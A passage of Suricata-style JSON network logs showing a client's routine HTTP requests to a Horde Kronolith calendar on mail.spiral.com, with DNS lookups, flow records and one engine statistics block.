{"timestamp":"2020-02-29T00:12:44.537309+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:12:44.545353+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:12:44.548279+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":12}} {"timestamp":"2020-02-29T00:12:44.548593+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:12:44.600798+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.634787+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.795519+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.805646+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24982,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820640+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820982+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:12:44.838775+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} {"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.958321+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56223,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:45.000735+0000","flow_id":150206485572827,"event_type":"flow","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":12,"bytes_toserver":4491,"bytes_toclient":7846,"start":"2020-02-29T00:11:35.994523+0000","end":"2020-02-29T00:11:43.053860+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001038+0000","flow_id":1202052566297535,"event_type":"flow","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":26,"pkts_toclient":25,"bytes_toserver":6852,"bytes_toclient":20641,"start":"2020-02-29T00:11:35.994239+0000","end":"2020-02-29T00:11:43.048709+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1a","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001105+0000","flow_id":1062938575886898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:11:39.383538+0000","end":"2020-02-29T00:11:44.702752+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001326+0000","flow_id":701495603006587,"event_type":"flow","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":26,"bytes_toserver":3440,"bytes_toclient":28434,"start":"2020-02-29T00:11:38.232571+0000","end":"2020-02-29T00:11:44.693708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":6}} {"timestamp":"2020-02-29T00:12:45.107378+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":972},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":15}} {"timestamp":"2020-02-29T00:12:45.107433+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137}} {"timestamp":"2020-02-29T00:12:47.000497+0000","flow_id":360397875076404,"event_type":"flow","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:46.417076+0000","end":"2020-02-29T00:07:46.525040+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:49.000552+0000","flow_id":1491464643110889,"event_type":"flow","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":852,"bytes_toclient":659,"start":"2020-02-29T00:11:43.157673+0000","end":"2020-02-29T00:11:48.161299+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:49.822840+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":1}} {"timestamp":"2020-02-29T00:12:50.000580+0000","flow_id":1914802374239664,"event_type":"flow","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:48.976304+0000","end":"2020-02-29T00:07:49.084348+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:50.097220+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":6}} {"timestamp":"2020-02-29T00:12:50.110860+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3298,"tx_id":15}} {"timestamp":"2020-02-29T00:12:50.949751+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47381,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:50.954845+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820}} {"timestamp":"2020-02-29T00:12:51.000251+0000","event_type":"stats","stats":{"uptime":14423,"capture":{"kernel_packets":135307,"kernel_drops":0},"decoder":{"pkts":135315,"bytes":93285532,"invalid":187,"ipv4":133822,"ipv6":8,"ethernet":135315,"raw":0,"null":0,"sll":0,"tcp":128534,"udp":5086,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2764,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2780,"synack":2771,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1803,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2323,"failed_udp":111},"tx":{"http":4654,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2403}},"flow_mgr":{"closed_pruned":2742,"new_pruned":15,"est_pruned":2367,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22738,"memcap_state":0,"memcap_global":0},"http":{"memuse":101791,"memcap":0}}} {"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.058015+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49307,"proto":"UDP","dns":{"type":"answer","id":47381,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343}} {"timestamp":"2020-02-29T00:12:51.088686+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":109,"tx_id":0}} {"timestamp":"2020-02-29T00:12:51.118278+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38583,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:51.150847+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/redbox_spinner.gif","state":"CLOSED","stored":false,"size":6820,"tx_id":0}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:51.226233+0000","flow_id":340808549256710,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59515,"proto":"UDP","dns":{"type":"answer","id":38583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121}} {"timestamp":"2020-02-29T00:12:51.252283+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:12:52.000314+0000","flow_id":872744524144809,"event_type":"flow","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.417961+0000","end":"2020-02-29T00:07:51.525948+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:53.000241+0000","flow_id":859382880918804,"event_type":"flow","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:51.908564+0000","end":"2020-02-29T00:07:52.016611+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:56.090899+0000","flow_id":1905800142540588,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/getEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":343},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/getEvent","state":"CLOSED","stored":false,"size":492,"tx_id":0}} {"timestamp":"2020-02-29T00:12:56.254011+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 